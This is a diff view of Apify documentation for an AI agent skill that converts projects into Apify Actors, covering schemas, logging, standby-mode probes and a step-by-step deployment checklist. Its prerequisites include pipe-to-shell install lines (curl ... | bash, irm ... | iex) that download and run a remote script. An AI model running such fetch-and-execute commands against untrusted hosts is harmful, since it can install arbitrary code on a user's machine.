{
|
||||
"actorKeyValueStoreSchemaVersion": 1,
|
||||
"title": "string (required)",
|
||||
"description": "string (optional)",
|
||||
"collections": {
|
||||
"<COLLECTION_NAME>": {
|
||||
"title": "string (required)",
|
||||
"description": "string (optional)",
|
||||
"key": "string (conditional - use key OR keyPrefix)",
|
||||
"keyPrefix": "string (conditional - use key OR keyPrefix)",
|
||||
"contentTypes": ["string (optional)"],
|
||||
"jsonSchema": "object (optional)"
|
||||
}
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
## Properties
|
||||
|
||||
### Key-Value Store Schema Properties
|
||||
|
||||
- `actorKeyValueStoreSchemaVersion` (integer, required) - Version of key-value store schema structure document (currently only version 1)
|
||||
- `title` (string, required) - Title of the schema
|
||||
- `description` (string, optional) - Description of the schema
|
||||
- `collections` (Object, required) - Object where each key is a collection ID and value is a Collection object
|
||||
|
||||
### Collection Properties
|
||||
|
||||
- `title` (string, required) - Collection title shown in UI tabs
|
||||
- `description` (string, optional) - Description appearing in UI tooltips
|
||||
- `key` (string, conditional) - Single specific key for this collection
|
||||
- `keyPrefix` (string, conditional) - Prefix for keys included in this collection
|
||||
- `contentTypes` (string[], optional) - Allowed content types for validation
|
||||
- `jsonSchema` (object, optional) - JSON Schema Draft 07 format for `application/json` content type validation
|
||||
|
||||
Either `key` or `keyPrefix` must be specified for each collection, but not both.
|
||||
@@ -0,0 +1,50 @@
|
||||
# Actor Logging Reference
|
||||
|
||||
## JavaScript and TypeScript
|
||||
|
||||
**ALWAYS use the `apify/log` package for logging** - This package contains critical security logic including censoring sensitive data (Apify tokens, API keys, credentials) to prevent accidental exposure in logs.
|
||||
|
||||
### Available Log Levels in `apify/log`
|
||||
|
||||
The Apify log package provides the following methods for logging:
|
||||
|
||||
- `log.debug()` - Debug level logs (detailed diagnostic information)
|
||||
- `log.info()` - Info level logs (general informational messages)
|
||||
- `log.warning()` - Warning level logs (warning messages for potentially problematic situations)
|
||||
- `log.warningOnce()` - Warning level logs (same warning message logged only once)
|
||||
- `log.error()` - Error level logs (error messages for failures)
|
||||
- `log.exception()` - Exception level logs (for exceptions with stack traces)
|
||||
- `log.perf()` - Performance level logs (performance metrics and timing information)
|
||||
- `log.deprecated()` - Deprecation level logs (warnings about deprecated code)
|
||||
- `log.softFail()` - Soft failure logs (non-critical failures that don't stop execution, e.g., input validation errors, skipped items)
|
||||
- `log.internal()` - Internal level logs (internal/system messages)
|
||||
|
||||
### Best Practices
|
||||
|
||||
- Use `log.debug()` for detailed operation-level diagnostics (inside functions)
|
||||
- Use `log.info()` for general informational messages (API requests, successful operations)
|
||||
- Use `log.warning()` for potentially problematic situations (validation failures, unexpected states)
|
||||
- Use `log.error()` for actual errors and failures
|
||||
- Use `log.exception()` for caught exceptions with stack traces
|
||||
|
||||
## Python
|
||||
|
||||
**ALWAYS use `Actor.log` for logging** - This logger contains critical security logic including censoring sensitive data (Apify tokens, API keys, credentials) to prevent accidental exposure in logs.
|
||||
|
||||
### Available Log Levels
|
||||
|
||||
The Apify Actor logger provides the following methods for logging:
|
||||
|
||||
- `Actor.log.debug()` - Debug level logs (detailed diagnostic information)
|
||||
- `Actor.log.info()` - Info level logs (general informational messages)
|
||||
- `Actor.log.warning()` - Warning level logs (warning messages for potentially problematic situations)
|
||||
- `Actor.log.error()` - Error level logs (error messages for failures)
|
||||
- `Actor.log.exception()` - Exception level logs (for exceptions with stack traces)
|
||||
|
||||
### Best Practices
|
||||
|
||||
- Use `Actor.log.debug()` for detailed operation-level diagnostics (inside functions)
|
||||
- Use `Actor.log.info()` for general informational messages (API requests, successful operations)
|
||||
- Use `Actor.log.warning()` for potentially problematic situations (validation failures, unexpected states)
|
||||
- Use `Actor.log.error()` for actual errors and failures
|
||||
- Use `Actor.log.exception()` for caught exceptions with stack traces
|
||||
@@ -0,0 +1,49 @@
|
||||
# Output Schema Reference
|
||||
|
||||
The Actor output schema builds upon the schemas for the dataset and key-value store. It specifies where an Actor stores its output and defines templates for accessing that output. Apify Console uses these output definitions to display run results.
|
||||
|
||||
## Structure
|
||||
|
||||
```json
|
||||
{
|
||||
"actorOutputSchemaVersion": 1,
|
||||
"title": "<OUTPUT-SCHEMA-TITLE>",
|
||||
"properties": {
|
||||
/* define your outputs here */
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
## Example
|
||||
|
||||
```json
|
||||
{
|
||||
"actorOutputSchemaVersion": 1,
|
||||
"title": "Output schema of the files scraper",
|
||||
"properties": {
|
||||
"files": {
|
||||
"type": "string",
|
||||
"title": "Files",
|
||||
"template": "{{links.apiDefaultKeyValueStoreUrl}}/keys"
|
||||
},
|
||||
"dataset": {
|
||||
"type": "string",
|
||||
"title": "Dataset",
|
||||
"template": "{{links.apiDefaultDatasetUrl}}/items"
|
||||
}
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
## Output Schema Template Variables
|
||||
|
||||
- `links` (object) - Contains quick links to most commonly used URLs
|
||||
- `links.publicRunUrl` (string) - Public run url in format `https://console.apify.com/view/runs/:runId`
|
||||
- `links.consoleRunUrl` (string) - Console run url in format `https://console.apify.com/actors/runs/:runId`
|
||||
- `links.apiRunUrl` (string) - API run url in format `https://api.apify.com/v2/actor-runs/:runId`
|
||||
- `links.apiDefaultDatasetUrl` (string) - API url of default dataset in format `https://api.apify.com/v2/datasets/:defaultDatasetId`
|
||||
- `links.apiDefaultKeyValueStoreUrl` (string) - API url of default key-value store in format `https://api.apify.com/v2/key-value-stores/:defaultKeyValueStoreId`
|
||||
- `links.containerRunUrl` (string) - URL of a webserver running inside the run in format `https://<containerId>.runs.apify.net/`
|
||||
- `run` (object) - Contains information about the run same as it is returned from the `GET Run` API endpoint
|
||||
- `run.defaultDatasetId` (string) - ID of the default dataset
|
||||
- `run.defaultKeyValueStoreId` (string) - ID of the default key-value store
|
||||
@@ -0,0 +1,61 @@
|
||||
# Actor Standby Mode Reference
|
||||
|
||||
## JavaScript and TypeScript
|
||||
|
||||
- **NEVER disable standby mode (`usesStandbyMode: false`) in `.actor/actor.json` without explicit permission** - Actor Standby mode solves this problem by letting you have the Actor ready in the background, waiting for the incoming HTTP requests. In a sense, the Actor behaves like a real-time web server or standard API server instead of running the logic once to process everything in batch. Always keep `usesStandbyMode: true` unless there is a specific documented reason to disable it
|
||||
- **ALWAYS implement readiness probe handler for standby Actors** - Handle the `x-apify-container-server-readiness-probe` header at GET / endpoint to ensure proper Actor lifecycle management
|
||||
|
||||
You can recognize a standby Actor by checking the `usesStandbyMode` property in `.actor/actor.json`. Only implement the readiness probe if this property is set to `true`.
|
||||
|
||||
### Readiness Probe Implementation Example
|
||||
|
||||
```javascript
|
||||
// Apify standby readiness probe at root path
|
||||
app.get('/', (req, res) => {
|
||||
res.writeHead(200, { 'Content-Type': 'text/plain' });
|
||||
if (req.headers['x-apify-container-server-readiness-probe']) {
|
||||
res.end('Readiness probe OK\n');
|
||||
} else {
|
||||
res.end('Actor is ready\n');
|
||||
}
|
||||
});
|
||||
```
|
||||
|
||||
Key points:
|
||||
|
||||
- Detect the `x-apify-container-server-readiness-probe` header in incoming requests
|
||||
- Respond with HTTP 200 status code for both readiness probe and normal requests
|
||||
- This enables proper Actor lifecycle management in standby mode
|
||||
|
||||
## Python
|
||||
|
||||
- **NEVER disable standby mode (`usesStandbyMode: false`) in `.actor/actor.json` without explicit permission** - Actor Standby mode solves this problem by letting you have the Actor ready in the background, waiting for the incoming HTTP requests. In a sense, the Actor behaves like a real-time web server or standard API server instead of running the logic once to process everything in batch. Always keep `usesStandbyMode: true` unless there is a specific documented reason to disable it
|
||||
- **ALWAYS implement readiness probe handler for standby Actors** - Handle the `x-apify-container-server-readiness-probe` header at GET / endpoint to ensure proper Actor lifecycle management
|
||||
|
||||
You can recognize a standby Actor by checking the `usesStandbyMode` property in `.actor/actor.json`. Only implement the readiness probe if this property is set to `true`.
|
||||
|
||||
### Readiness Probe Implementation Example
|
||||
|
||||
```python
|
||||
# Apify standby readiness probe
|
||||
from http.server import SimpleHTTPRequestHandler
|
||||
|
||||
class GetHandler(SimpleHTTPRequestHandler):
|
||||
def do_GET(self):
|
||||
# Handle Apify standby readiness probe
|
||||
if 'x-apify-container-server-readiness-probe' in self.headers:
|
||||
self.send_response(200)
|
||||
self.end_headers()
|
||||
self.wfile.write(b'Readiness probe OK')
|
||||
return
|
||||
|
||||
self.send_response(200)
|
||||
self.end_headers()
|
||||
self.wfile.write(b'Actor is ready')
|
||||
```
|
||||
|
||||
Key points:
|
||||
|
||||
- Detect the `x-apify-container-server-readiness-probe` header in incoming requests
|
||||
- Respond with HTTP 200 status code for both readiness probe and normal requests
|
||||
- This enables proper Actor lifecycle management in standby mode
|
||||
184
web-app/public/skills/apify-actorization/SKILL.md
Normal file
184
web-app/public/skills/apify-actorization/SKILL.md
Normal file
@@ -0,0 +1,184 @@
|
||||
---
|
||||
name: apify-actorization
|
||||
description: "Convert existing projects into Apify Actors - serverless cloud programs. Actorize JavaScript/TypeScript (SDK with Actor.init/exit), Python (async context manager), or any language (CLI wrapper). Us..."
|
||||
---
|
||||
|
||||
# Apify Actorization
|
||||
|
||||
Actorization converts existing software into reusable serverless applications compatible with the Apify platform. Actors are programs packaged as Docker images that accept well-defined JSON input, perform an action, and optionally produce structured JSON output.
|
||||
|
||||
## Quick Start
|
||||
|
||||
1. Run `apify init` in project root
|
||||
2. Wrap code with SDK lifecycle (see language-specific section below)
|
||||
3. Configure `.actor/input_schema.json`
|
||||
4. Test with `apify run --input '{"key": "value"}'`
|
||||
5. Deploy with `apify push`
|
||||
|
||||
## When to Use This Skill
|
||||
|
||||
- Converting an existing project to run on Apify platform
|
||||
- Adding Apify SDK integration to a project
|
||||
- Wrapping a CLI tool or script as an Actor
|
||||
- Migrating a Crawlee project to Apify
|
||||
|
||||
## Prerequisites
|
||||
|
||||
Verify `apify` CLI is installed:
|
||||
|
||||
```bash
|
||||
apify --help
|
||||
```
|
||||
|
||||
If not installed:
|
||||
|
||||
```bash
|
||||
curl -fsSL https://apify.com/install-cli.sh | bash
|
||||
|
||||
# Or (Mac): brew install apify-cli
|
||||
# Or (Windows): irm https://apify.com/install-cli.ps1 | iex
|
||||
# Or: npm install -g apify-cli
|
||||
```
|
||||
|
||||
Verify CLI is logged in:
|
||||
|
||||
```bash
|
||||
apify info # Should return your username
|
||||
```
|
||||
|
||||
If not logged in, check if `APIFY_TOKEN` environment variable is defined. If not, ask the user to generate one at https://console.apify.com/settings/integrations, then:
|
||||
|
||||
```bash
|
||||
apify login -t $APIFY_TOKEN
|
||||
```
|
||||
|
||||
## Actorization Checklist
|
||||
|
||||
Copy this checklist to track progress:
|
||||
|
||||
- [ ] Step 1: Analyze project (language, entry point, inputs, outputs)
|
||||
- [ ] Step 2: Run `apify init` to create Actor structure
|
||||
- [ ] Step 3: Apply language-specific SDK integration
|
||||
- [ ] Step 4: Configure `.actor/input_schema.json`
|
||||
- [ ] Step 5: Configure `.actor/output_schema.json` (if applicable)
|
||||
- [ ] Step 6: Update `.actor/actor.json` metadata
|
||||
- [ ] Step 7: Test locally with `apify run`
|
||||
- [ ] Step 8: Deploy with `apify push`
|
||||
|
||||
## Step 1: Analyze the Project
|
||||
|
||||
Before making changes, understand the project:
|
||||
|
||||
1. **Identify the language** - JavaScript/TypeScript, Python, or other
|
||||
2. **Find the entry point** - The main file that starts execution
|
||||
3. **Identify inputs** - Command-line arguments, environment variables, config files
|
||||
4. **Identify outputs** - Files, console output, API responses
|
||||
5. **Check for state** - Does it need to persist data between runs?
|
||||
|
||||
## Step 2: Initialize Actor Structure
|
||||
|
||||
Run in the project root:
|
||||
|
||||
```bash
|
||||
apify init
|
||||
```
|
||||
|
||||
This creates:
|
||||
- `.actor/actor.json` - Actor configuration and metadata
|
||||
- `.actor/input_schema.json` - Input definition for the Apify Console
|
||||
- `Dockerfile` (if not present) - Container image definition
|
||||
|
||||
## Step 3: Apply Language-Specific Changes
|
||||
|
||||
Choose based on your project's language:
|
||||
|
||||
- **JavaScript/TypeScript**: See [js-ts-actorization.md](references/js-ts-actorization.md)
|
||||
- **Python**: See [python-actorization.md](references/python-actorization.md)
|
||||
- **Other Languages (CLI-based)**: See [cli-actorization.md](references/cli-actorization.md)
|
||||
|
||||
### Quick Reference
|
||||
|
||||
| Language | Install | Wrap Code |
|
||||
|----------|---------|-----------|
|
||||
| JS/TS | `npm install apify` | `await Actor.init()` ... `await Actor.exit()` |
|
||||
| Python | `pip install apify` | `async with Actor:` |
|
||||
| Other | Use CLI in wrapper script | `apify actor:get-input` / `apify actor:push-data` |
|
||||
|
||||
## Steps 4-6: Configure Schemas
|
||||
|
||||
See [schemas-and-output.md](references/schemas-and-output.md) for detailed configuration of:
|
||||
- Input schema (`.actor/input_schema.json`)
|
||||
- Output schema (`.actor/output_schema.json`)
|
||||
- Actor configuration (`.actor/actor.json`)
|
||||
- State management (request queues, key-value stores)
|
||||
|
||||
Validate schemas against `@apify/json_schemas` npm package.
|
||||
|
||||
## Step 7: Test Locally
|
||||
|
||||
Run the actor with inline input (for JS/TS and Python actors):
|
||||
|
||||
```bash
|
||||
apify run --input '{"startUrl": "https://example.com", "maxItems": 10}'
|
||||
```
|
||||
|
||||
Or use an input file:
|
||||
|
||||
```bash
|
||||
apify run --input-file ./test-input.json
|
||||
```
|
||||
|
||||
**Important:** Always use `apify run`, not `npm start` or `python main.py`. The CLI sets up the proper environment and storage.
|
||||
|
||||
## Step 8: Deploy
|
||||
|
||||
```bash
|
||||
apify push
|
||||
```
|
||||
|
||||
This uploads and builds your actor on the Apify platform.
|
||||
|
||||
## Monetization (Optional)
|
||||
|
||||
After deploying, you can monetize your actor in the Apify Store. The recommended model is **Pay Per Event (PPE)**:
|
||||
|
||||
- Per result/item scraped
|
||||
- Per page processed
|
||||
- Per API call made
|
||||
|
||||
Configure PPE in the Apify Console under Actor > Monetization. Charge for events in your code with `await Actor.charge('result')`.
|
||||
|
||||
Other options: **Rental** (monthly subscription) or **Free** (open source).
|
||||
|
||||
## Pre-Deployment Checklist
|
||||
|
||||
- [ ] `.actor/actor.json` exists with correct name and description
|
||||
- [ ] `.actor/actor.json` validates against `@apify/json_schemas` (`actor.schema.json`)
|
||||
- [ ] `.actor/input_schema.json` defines all required inputs
|
||||
- [ ] `.actor/input_schema.json` validates against `@apify/json_schemas` (`input.schema.json`)
|
||||
- [ ] `.actor/output_schema.json` defines output structure (if applicable)
|
||||
- [ ] `.actor/output_schema.json` validates against `@apify/json_schemas` (`output.schema.json`)
|
||||
- [ ] `Dockerfile` is present and builds successfully
|
||||
- [ ] `Actor.init()` / `Actor.exit()` wraps main code (JS/TS)
|
||||
- [ ] `async with Actor:` wraps main code (Python)
|
||||
- [ ] Inputs are read via `Actor.getInput()` / `Actor.get_input()`
|
||||
- [ ] Outputs use `Actor.pushData()` or key-value store
|
||||
- [ ] `apify run` executes successfully with test input
|
||||
- [ ] `generatedBy` is set in actor.json meta section
|
||||
|
||||
## Apify MCP Tools
|
||||
|
||||
If MCP server is configured, use these tools for documentation:
|
||||
|
||||
- `search-apify-docs` - Search documentation
|
||||
- `fetch-apify-docs` - Get full doc pages
|
||||
|
||||
Otherwise, the MCP Server url: `https://mcp.apify.com/?tools=docs`.
|
||||
|
||||
## Resources
|
||||
|
||||
- [Actorization Academy](https://docs.apify.com/academy/actorization) - Comprehensive guide
|
||||
- [Apify SDK for JavaScript](https://docs.apify.com/sdk/js) - Full SDK reference
|
||||
- [Apify SDK for Python](https://docs.apify.com/sdk/python) - Full SDK reference
|
||||
- [Apify CLI Reference](https://docs.apify.com/cli) - CLI commands
|
||||
- [Actor Specification](https://raw.githubusercontent.com/apify/actor-whitepaper/refs/heads/master/README.md) - Complete specification
|
||||
Some files were not shown because too many files have changed in this diff Show More
Reference in New Issue
Block a user